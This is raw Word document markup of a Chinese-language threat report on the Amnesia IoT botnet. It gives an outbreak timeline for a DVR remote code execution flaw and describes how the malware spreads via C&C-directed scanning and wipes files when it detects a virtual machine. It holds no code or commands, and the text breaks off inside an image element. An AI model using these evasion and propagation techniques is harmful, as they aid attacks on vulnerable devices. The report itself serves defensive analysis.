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5AD" w:rsidRPr="007A375D" w:rsidRDefault="00DA7FE8" w:rsidP="00C46CE5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="amnesia威胁报告"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mnesia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>威胁报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00890DAD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目前针对物联网设备的恶意软件越来越普遍，一般来说针对物联网设备的攻击分为两个方面：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一是</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过自动化工具使用密码字典尝试批量猜解物联网设备的管理员帐号及密码，导致攻击者可以轻易访问物联网设备</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>物联网设备被攻击者控制</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二是</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为物联网设备存在安全漏洞，攻击者利用漏洞来对设备进行攻击，达到控制设备的目的。</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被控制的物联网设备往往会被攻击者集中起来，组建僵尸网络，从而发起</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>分布式拒绝服务攻击</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>近日，一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tsunami</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的新变种</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的恶意软件席卷网络。本文主要从爆发时间线、传播原理、对抗办法几个方面进行分析和阐述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="一主要爆发时间线"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一、主要爆发时间线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>月，一个名为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rotem Kerner</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的安全研究员发现，某款</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数字视频录像机</w:t>
      </w:r>
      <w:r w:rsidR="00344924">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在远程代码利用漏洞，黑客可以利用漏洞远程悄无声息地在设备上执行命令并进行完全掌控，随后他将其发现的漏洞上报了</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>厂商，但是未得到任何回应。心怀不轨的黑客们发现了这座潜在的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>金矿</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，名为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的恶魔便悄然诞生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>即为通过利用漏洞来对物联网设备进</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>行攻击的恶意软件，</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也是首个采用虚拟机检测技术来躲避恶意软件分析沙箱的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>嵌入式恶意软件。</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tsunami</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络的变种，其父辈</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tsunami</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是一种下载程序</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/IRC</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸程序后门，被网络犯罪分子用来发动</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidR="007A375D" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络允许攻击者利用</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程代码执行漏洞对未打补丁的数字视频录像机设备发起攻击。其中全球大概</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多家厂商受到影响，这些厂商均使用了由</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TVT Digital</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（深圳同为）生产的设备。根据目前的扫描数据，全球有</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>227000</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>台设备受此漏洞影响，主要受影响的国家和地区包括：中国台湾、美国、以色</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>列、土耳其和印度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="二技术分析"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>二、技术分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00934A03" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654144" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BADA721">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>243840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1358900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5486400" cy="33877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11351"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3387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572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本次发现的</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>僵尸网络运行在</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PowerPC</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>架构上，首先攻击者通过暴力猜解或者其他手段感染</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设备，使</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码在</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> DVR</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上开始运行，当</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运行后，它会连接远程</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，并根据控制指令中指定的</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>范围扫描网络中的其他</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DVR</w:t>
      </w:r>
      <w:r w:rsidR="00FF572C" w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设备进行传播。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D3F7B" w:rsidRPr="003D3F7B" w:rsidRDefault="003D3F7B" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD51CD" w:rsidRPr="003737A1" w:rsidRDefault="00DD51CD" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="000025BD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="反虚拟机"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRPr="007A375D" w:rsidRDefault="00FF572C" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是首个采用虚拟机检测技术来躲避恶意软件分析沙箱的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>嵌入式恶意代码。针对</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或安卓的恶意软件常常会采用虚拟机</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>检测技术来躲避沙箱环境的分析，然而该技术在</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>嵌入式系统上却很少采用。当僵尸网络</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Amnesia</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现自身运行于</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> VMware</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>QEMU</w:t>
      </w:r>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>虚拟机中，它将删除系统中的所有文件来阻碍恶意软件分析沙箱的正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005965AD" w:rsidRDefault="003D3F7B" w:rsidP="00C46CE5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="007A375D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>205740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1737360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5783107" cy="3600000"/>
